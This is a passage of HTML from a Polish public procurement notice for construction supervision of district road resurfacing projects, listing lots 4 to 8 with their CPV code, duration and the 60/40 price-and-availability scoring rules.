budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2333 S ul. Jana Chrzciciela w Łazach polegająca na wzmocnieniu nawierzchni bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2320 S ul. Lubliniecka w Łagiewnikach Małych i Skrzydłowicach polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2351 S relacji skrzyżowanie z DK11 do granicy powiatu (kier. Krupski Młyn) polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego”,</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2328 S Cieszowa - Koszęcin polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:„Przebudowa odcinka drogi powiatowej nr 2310 S ul. ul. Karola Miarki w Woźnikach – Ligocie Woźnickiej polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma 